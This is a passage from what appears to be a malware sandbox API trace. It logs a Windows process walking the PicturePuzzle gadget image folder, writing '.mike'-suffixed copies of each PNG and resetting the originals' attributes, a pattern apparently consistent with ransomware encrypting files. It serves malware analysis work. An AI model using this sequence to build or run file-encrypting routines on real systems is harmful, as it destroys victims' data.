Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png", dwFileAttributes=0x80) returned 0 [0133.266] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.271] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png", dwFileAttributes=0x80) returned 0 [0133.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.280] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png", dwFileAttributes=0x80) returned 0 [0133.281] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.286] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png", dwFileAttributes=0x80) returned 0 [0133.287] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.306] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png", dwFileAttributes=0x80) returned 0 [0133.308] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.313] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png", dwFileAttributes=0x80) returned 0 [0133.314] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.322] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png", dwFileAttributes=0x80) returned 0 [0133.324] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.328] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png", dwFileAttributes=0x80) returned 0 [0133.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.334] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png", dwFileAttributes=0x80) returned 0 [0133.336] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.341] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png", dwFileAttributes=0x80) returned 0 [0133.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.347] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png", dwFileAttributes=0x80) returned 0 [0133.348] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.353] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png", dwFileAttributes=0x80) returned 0 [0133.354] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0133.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.355] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png"), fInfoLevelId=0x0, lpFileInformation=0x217cea0 | out: lpFileInformation=0x217cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba18d99f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba18d99f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0b6a37c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcd9)) returned 1 [0133.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.355] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png"), fInfoLevelId=0x0, lpFileInformation=0x217d208 | out: lpFileInformation=0x217d208*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba18d99f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba18d99f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0b6a37c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcd9)) returned 1 [0133.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.356] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0133.356] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0133.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.358] GetFileType (hFile=0x284) returned 0x1 [0133.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.358] GetFileType (hFile=0x284) returned 0x1 [0133.358] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0133.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.359] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png"), fInfoLevelId=0x0, lpFileInformation=0x217dd20 | out: lpFileInformation=0x217dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba18d99f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba18d99f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0b6a37c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcd9)) returned 1 [0133.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0133.359] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.359] GetFileType (hFile=0x284) returned 0x1 [0133.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0133.360] GetFileType (hFile=0x284) returned 0x1 [0133.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.361] GetFileType (hFile=0x284) returned 0x1 [0133.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.361] GetFileType (hFile=0x284) returned 0x1 [0133.361] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0133.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0133.362] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.362] GetFileType (hFile=0x284) returned 0x1 [0133.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0133.362] GetFileType (hFile=0x284) returned 0x1 [0133.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike", lpFilePart=0x0) returned 0x5e [0133.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.364] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c7c2c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18c7c2c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18c7c2c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf00)) returned 1 [0133.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", lpFilePart=0x0) returned 0x59 [0133.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike", lpFilePart=0x0) returned 0x5e [0133.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.364] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x218bad0 | out: lpFileInformation=0x218bad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c7c2c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18c7c2c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18c7c2c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf00)) returned 1 [0133.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", lpFilePart=0x0) returned 0x59 [0133.364] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", dwFileAttributes=0x80) returned 0 [0133.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0133.365] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c7c2c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18c7c2c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18c7c2c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf00)) returned 1 [0133.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0133.365] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", lpFilePart=0x0) returned 0x59 [0133.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0133.366] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0133.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0133.367] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0133.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.367] GetFileType (hFile=0x284) returned 0x1 [0133.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0133.367] GetFileType (hFile=0x284) returned 0x1 [0133.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0133.368] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0133.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.368] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), fInfoLevelId=0x0, lpFileInformation=0x218e518 | out: lpFileInformation=0x218e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba18d99f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba18d99f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0bdc79c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb43)) returned 1 [0133.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.368] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.368] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), fInfoLevelId=0x0, lpFileInformation=0x218e8a4 | out: lpFileInformation=0x218e8a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba18d99f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba18d99f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0bdc79c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb43)) returned 1 [0133.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.368] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.369] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.369] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.369] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0133.369] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0133.369] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike", lpFilePart=0x0) returned 0x64 [0133.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.370] GetFileType (hFile=0x284) returned 0x1 [0133.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.370] GetFileType (hFile=0x284) returned 0x1 [0133.370] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0133.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.371] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" 